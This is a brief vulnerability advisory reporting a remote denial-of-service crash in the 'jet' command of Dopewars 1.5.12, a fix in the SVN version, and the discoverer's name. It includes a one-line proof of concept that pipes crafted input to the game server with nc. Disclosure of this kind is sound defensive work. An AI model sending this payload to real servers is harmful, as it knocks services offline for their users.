Dopewars version 1.5.12 is susceptible to a remote denial of service vulnerability.
aab85c14b9d4e987d213433c3c431ba26abe2139f6eadf90354976381447703f
## Description ##
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
## POC ##
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
## Fix ##
This issue is resolved in the SVN version of the application.
## Discovered by Doug Prostko